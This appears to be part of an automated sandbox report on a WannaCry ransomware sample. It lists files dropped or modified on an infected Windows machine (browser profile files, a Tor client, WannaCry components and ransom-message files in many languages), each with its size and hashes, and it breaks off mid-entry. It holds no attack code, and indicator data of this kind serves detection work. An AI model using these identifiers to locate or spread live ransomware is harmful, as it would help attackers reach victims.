a703fc21135167df83bd5de46e0f69d7b6a43f48617b5465e172b1faf3f2c0da

SHA512
86921779c10e48a7ac5dda1131c752c2b97ef5b29545cb6f639c1339cac1349f6c017821505e9b8dd661b046e63adc35ffc321411ce4012f53ad13656e1eaae3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
695e4e65f236d01b85aca7f0b5378736

SHA1
cd20f4f476f821e0f0b673fc5a98430fde7293fa

SHA256
d67a82c8bf64682c623aa529872f59b9ca2a3ab94de2fe534bb1d1e9f66e7f8a

SHA512
777d501df29203419790d1298dc74327811824263b50d799ce172f19090c480427baaff07399a4ff45b0fb70480f0b912926049d5d84a8f7f7a90a6b7834d361

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
acd9944de9f18ab045eba87a6c8a5a98

SHA1
6be50cae2607871e6b8d601f58251f78ae689cb6

SHA256
03c923784fbae355d686ae03488753166f8c7e2528447f4b028cde6aae0e7452

SHA512
f0ff500d8da2fe1339bdd46fb4a76f65370ff20f3e2d9aea813514d0c134808c4e2ec881636b2ca01bcddee4ed993d4af334ebd0593b0048c58be3dd4e387d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
61fbd5746321e186a2dc85d56446ca88

SHA1
ea4c7fce878d59d657ffef51b61cf5aaaed0ba97

SHA256
568b327ae9bda202e4ba6340dc9fa7017ba4c4f17d54e4f4f6e4206bf748e125

SHA512
ad824f0058b4d360fbdf7a69cead8f93412a14e4154e9f51301ac56efff6f4ab299c12d16c262316f28040f3106cd74a60f4371aa965bf5c6cb1787ca3c351bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
00cb83f38be811789213455f0090586f

SHA1
4ed6dba085d7eba8c489ff029c94edb7377ae292

SHA256
dd44d6022d5bc4857ccf589d354ceae900430ac287e6f011ff8e3d531160f8fa

SHA512
887f3bd132a6f3881aa35c2ce64e038ab8ed47da9c97809ae29efe48dce562dd6a86c8c4d41e86d128ae8e0af4dd6cf9921e21b51206ceb38f53c769491218cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
7f48e12c664157f78a385a8024932381

SHA1
9190812be73125eff725a307cd0482774bca2023

SHA256
95f4f9d6b3c3455daef49deeee048c51ce46a45dafad5c1b13418493d8227ada

SHA512
87e66e7f492f9435188624cbf41000ac463abd753911bd22d5322cdc41ac91c4b3f14454b5e5d6c006d171f26bdb1ff3cd637df388482b8fe9dbdc66f0b75952

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
c773c0cabb2cec103afb23c692e53651

SHA1
a6e631413de4405851278356a200483391a56b41

SHA256
2fe651f3d1dad18c7eae21a8c8351d61ba40554dcc151ba6ce4c5ef06803a56c

SHA512
03b28043c2893eacec969e2024ed4482f2fa9cbc24f7e42a7422d3e944a5ecd5e37120109df57473b9a3493de1575ce34d3e9817cc9fbd851e774134d2250cfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
cd1b84328634ea783ac06ddf08878761

SHA1
552553d95aa3ce7b85f50519ed36145da47ed570

SHA256
a696b6dc108c7d6e3b417ae5e4f577872947269a1a6d6631e48091b903f35e1b

SHA512
162b2b2af1d5a3f03de04eaaa2eac076dbcf7c6d743b134a0ef092bc5642ace26d040c535fecac1340f07bfba7dfaa4b748672e02e5299d0071c334c7139cf4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
17bd146b1c25982a02c23d5d77eeb350

SHA1
8192b4dcf4578b44cca6d421022b2a018c301e39

SHA256
41495452a5ffef73bc2bf147fea4db92a0859a1992bbcbdda77819d2314607f0

SHA512
b7acdfd5d700ff92e55875d723a265025b1601d54b1ff39524cb345332b55893abb8b95dfd0867b7fcac64424c4486f108516c8452987bd1ed2d38e736654c34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
3ebc2927e073487fb76673c56a09ceb0

SHA1
6bcf746233090b24a19a5fa13868bd22b35b3a75

SHA256
e5f3fe1201293e98b5e4fd4fb37b41187152e597731c6b6e718bca0f580942f5

SHA512
545ef22617205892fc72e63c86dc1bd7ebab0fc9a4ab5b631f384eee4988004d3da3d62982626281934835e3fc14a93484f7d75b3fe8bbddcadc4814d15845f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
86528c466169d7abbdbac52f2e85d989

SHA1
9eb6eae8fbb1f89f15e5c07c1b187876317d485e

SHA256
ed1d76c94ad3f4dafc81a4734f7a41255af24f83054c68d2d8fb190296ab16a3

SHA512
fd76b596da8ff1adec9b014c09f7f82803b0c89c1495da383580c00a3c9baf9b6a15638be922097f913f9030e285eb74304c3fbe9ef50941c17b87e10815d2fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
2a80d4ab30291975270f0cae503db585

SHA1
726b7c6bd36f356b8e621576b54e970489a56bef

SHA256
e307ca0d8febcebf488a1afcabd549556d03df63cbc883c80c1e011f22a556f9

SHA512
65f0e207f3aa9395f0b5a17af3474ee9eb7cd1acf95ce91f58ebf6d6f7aae1f5dc4f5a4af17dc22aaa5a96037364fae096abdd11748391da9d1c89be20176342

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
5dc63a512fb3801a0fdb7839d0bb169d

SHA1
4d0060195a94aa561c2500fb4ebbfc9a5e02135b

SHA256
001c38234ef82c75a813a76adfcb372af1e0e31e341924f698827a6365334107

SHA512
ca45817196810a26cc56cb1efd32811f54335dab36bebd185764850b494f4a0749061f5c96cf92b1ab65d0b153039e55769d3d61144d68756fee273a42cdc405

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe60e3dc.TMP

Filesize
203B

MD5
cde5acff546939ea7367b47bc2c00950

SHA1
31150f60ed114059e263042eb606aa30a47e1b30

SHA256
b9bd73b12cb1d9b5d2a1fa5fd3e709a04afc6c126bd5762f86f8c1d3d1b362a3

SHA512
7ccd138771575b7facce351e5e0a547893e78e9670bf5a49780a972b18bcb7c32fdfef660d00a03b6a11d175cee483c775a5aea83a545f421c610c95b92b268e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
fa2bce047c2e597966bcdbd8b63ee4f2

SHA1
4e449ae1508dea76091b8eb192dc8d89cd1ebdfa

SHA256
47f0dd66c66f5efa8b867567b247679e27ef70a66490cc7fadd7e9405fd5ee7a

SHA512
f15c5e1a7a562222ad2d3b00c12d64b3ffaed40f68851fab1a70fb0a814727a0f6f4f65f31d88aebb5ec26ea2666b91d0e6c1ca5b24bb030b5518a21c90df539

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
01e2b4f583bf9163a10928b761bdc2c6

SHA1
c782d73c8e9c095408277c2b55f1873176abd54a

SHA256
6be72ec729b17b83d27a17ee97fd28563ba67ef463ecc380714af8dcf792319d

SHA512
71a3bc6a7e28fcb84538f13eb37e21f884705fb8d485d6c8f24c6c3f619814ad0fd44b4eae3672fac6f252c69de617af7869656c6baf3745352b346a2abcfeff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
650829e80123702e68ff62c952392eab

SHA1
8cf5ddb577d24b531291130e71cb0538f37aced3

SHA256
f21bd4b65f04cd7e5c9be0cdf1569f113ff8323434ba0fd31b13bb2adfe025e4

SHA512
531c998e5a7427598737d48eb74205accb1cb7f835465b191600f16288e8439a2911a67f3790741ab62bcb14be70768d472c6968185b1635b04546c2ffe50bb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
f90a0985a054c7b891dbdc57041cac91

SHA1
341fbf11cda2e095dda4d472368d8eb3ac6298b9

SHA256
234896f3739108d0da012b1f9771044a1dacb94815e8297060a4ad174cc7f200

SHA512
261a2f161288cfedd9f1d0f25da473cc428bfe402e58a6ff49cbbdf4a39acd8ec05de3aecb26ddff5ea38b876f83ccb1065225317ec8da993794e0e36ff3429b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
78a599b4d2828bf4cf2ff3a8f2d39bb5

SHA1
864006e3b65d268ded0ff80ca3d9bd6900128750

SHA256
7c448996eddc406ec61fd709e19919f0f9ba1b65b593388d7617ad2cce4e5755

SHA512
cd72b611e70fd422f57e48a502a7014ec3a5d6058a754f360c7d67585211ef3bb58f6b69947eb345dc44293cf4f5143a2d3bb1c9bc6ef7367cbfbf058f8b2436

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\c3232477-8a85-4717-84ea-fb497f820209.tmp

Filesize
12KB

MD5
f2e16f491914e5868e4d26b627eb8635

SHA1
f83972a687673febeea1dc48c5cb8bdea272ad7f

SHA256
344531babc85928fcdfb5c2a00c29b259eaf0becc0c1b02f95cc3da3f9eb72c3

SHA512
747ab2e1cd013821956fda5aa938ec0f4ee2130a5c2d51565db65ecc9b2fd74c7e52f4b0afc0ab79e33e5e84c49ddd1ac13a8b9e49e79e11ff365be80a841b12

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
16.0MB

MD5
d9d53a0a7460083d74def37472ab5584

SHA1
98a0488f9cb1ba4cc46b882ff18327af59ddc07f

SHA256
9170bba1ad3e364b90a65b76c0e176f4b0487d29688b0f74c5a5b11d2f032c80

SHA512
17207af7065fd0cc48c41e80bf175d3ac28de24c55514d50f8ee55b90dd1ee866ceff3796b9c70cb06bf63adb2a6076a3d95fc1bef9457bf66019e48212b1e56

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
933B

MD5
7a2726bb6e6a79fb1d092b7f2b688af0

SHA1
b3effadce8b76aee8cd6ce2eccbb8701797468a2

SHA256
840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

SHA512
4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus.zip

Filesize
2.3MB

MD5
5641d280a62b66943bf2d05a72a972c7

SHA1
c857f1162c316a25eeff6116e249a97b59538585

SHA256
ab14c3f5741c06ad40632447b2fc10662d151afb32066a507aab4ec866ffd488

SHA512
0633bc32fa6d31b4c6f04171002ad5da6bb83571b9766e5c8d81002037b4bc96e86eb059d35cf5ce17a1a75767461ba5ac0a89267c3d0e5ce165719ca2af1752

Download Submit
C:\Users\Admin\Downloads\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 118377.crdownload

Filesize
315KB

MD5
9f8bc96c96d43ecb69f883388d228754

SHA1
61ed25a706afa2f6684bb4d64f69c5fb29d20953

SHA256
7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

SHA512
550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 152629.crdownload

Filesize
15.9MB

MD5
0f743287c9911b4b1c726c7c7edcaf7d

SHA1
9760579e73095455fcbaddfe1e7e98a2bb28bfe0

SHA256
716335ba5cd1e7186c40295b199190e2b6655e48f1c1cbe12139ba67faa5e1ac

SHA512
2a6dd6288303700ef9cb06ae1efeb1e121c89c97708e5ecd15ed9b2a35d0ecff03d8da58b30daeadad89bd38dc4649521ada149fb457408e5a2bdf1512f88677

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 199379.crdownload

Filesize
889KB

MD5
ca57530243c381d9154b22cea2b3ec68

SHA1
72dbcd84d9e26085b89c674397d8f97238d846d1

SHA256
91711348506ee7d327f16060d3256ce845474065a36b1b624ce390e0109fcea5

SHA512
0580b7f3454cea4fa54d23587c39c8713b060149b2e65bcef874bb0050a961256ce9db7b997d0ee3e98582151c8227a5370a1c6842b4e978a540bf9bb2461920

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 386100.crdownload

Filesize
431KB

MD5
fbbdc39af1139aebba4da004475e8839

SHA1
de5c8d858e6e41da715dca1c019df0bfb92d32c0

SHA256
630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da

SHA512
74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 489410.crdownload

Filesize
313KB

MD5
fe1bc60a95b2c2d77cd5d232296a7fa4

SHA1
c07dfdea8da2da5bad036e7c2f5d37582e1cf684

SHA256
b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d

SHA512
266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 489410.crdownload:SmartScreen

Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 650445.crdownload

Filesize
116KB

MD5
41789c704a0eecfdd0048b4b4193e752

SHA1
fb1e8385691fa3293b7cbfb9b2656cf09f20e722

SHA256
b2dcfdf9e7b09f2aa5004668370e77982963ace820e7285b2e264a294441da23

SHA512
76391ac85fdc3be75441fcd6e19bed08b807d3946c7281c647f16a3be5388f7be307e6323fac8502430a4a6d800d52a88709592a49011ecc89de4f19102435ea

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 726877.crdownload

Filesize
414KB

MD5
c850f942ccf6e45230169cc4bd9eb5c8

SHA1
51c647e2b150e781bd1910cac4061a2cee1daf89

SHA256
86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f

SHA512
2b3890241b8c8690aab0aed347daa778aba20f29f76e8b79b02953b6252324317520b91ea60d3ef73e42ad403f7a6e0e3f2a057799f21ed447dae7096b2f47d9

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 882036.crdownload

Filesize
1.0MB

MD5
055d1462f66a350d9886542d4d79bc2b

SHA1
f1086d2f667d807dbb1aa362a7a809ea119f2565

SHA256
dddf7894b2e6aafa1903384759d68455c3a4a8348a7e2da3bd272555eba9bec0

SHA512
2c5e570226252bdb2104c90d5b75f11493af8ed1be8cb0fd14e3f324311a82138753064731b80ce8e8b120b3fe7009b21a50e9f4583d534080e28ab84b83fee1

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 969319.crdownload

Filesize
1.1MB

MD5
a74dbc8fc2eeb7775a2384c7c0a3951b

SHA1
870256723b2f60d23cf1a9dcd6f5ddf799dd2978

SHA256
a09bc66ed2a838a7ecf0a35e8322d3e0433bac49462cc4756f2ff83e71b46a00

SHA512
dfee4aec598142ccf6f71ad396ed69501241063d4c7b2bf016c097d52dbf3a40c35744c455cde8ed64ec39eb86765d7c333d2aa63d36e31d4dc9c7a650f99816

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 985146.crdownload

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\Downloads\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\Downloads\c.wnry

Filesize
780B

MD5
8124a611153cd3aceb85a7ac58eaa25d

SHA1
c1d5cd8774261d810dca9b6a8e478d01cd4995d6

SHA256
0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

SHA512
b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

Download Submit
C:\Users\Admin\Downloads\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\Downloads\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\Downloads\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\Downloads\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\Downloads\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\Downloads\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\Downloads\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\Downloads\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\Downloads\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\Downloads\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Downloads\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\Downloads\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\Downloads\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\Downloads\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\Downloads\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\Downloads\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\Downloads\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\Downloads\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\Downloads\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\Downloads\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\Downloads\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\Downloads\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\Downloads\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\Downloads\msg\m_slovak.wnry

Filesize
40KB

MD5
